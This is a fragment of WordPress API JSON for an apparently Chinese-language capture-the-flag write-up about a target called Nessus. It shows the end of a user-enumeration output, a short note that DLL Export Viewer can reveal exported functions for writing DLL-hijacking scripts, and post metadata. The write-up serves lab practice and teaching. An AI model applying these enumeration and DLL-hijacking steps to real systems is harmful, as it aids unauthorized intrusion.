[+] Enumerated logged_on users<\/code><\/pre>\n<h2>\u5173\u4e8e\u9a8c\u8bc1\u54ea\u4e9b\u51fd\u6570\u53ef\u7528dll\u52ab\u6301<\/h2>\n<p><a href=\"https:\/\/www.nirsoft.net\/utils\/dll_export_viewer.html\">DLL Export Viewer<\/a> \u53ef\u7528\u67e5\u770b\u54ea\u4e9b\u51fd\u6570\u53ef\u7528\uff0c\u7136\u540e\u7528\u4e8e\u7f16\u5199\u811a\u672c\u8fdb\u884c\u52ab\u6301\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nessus \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus] \u2514\u2500$ rus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-845","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/845","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=845"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/845\/revisions"}],"predecessor-version":[{"id":846,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/845\/revisions\/846"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=845"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=845"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=845"}],"cu
ries":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}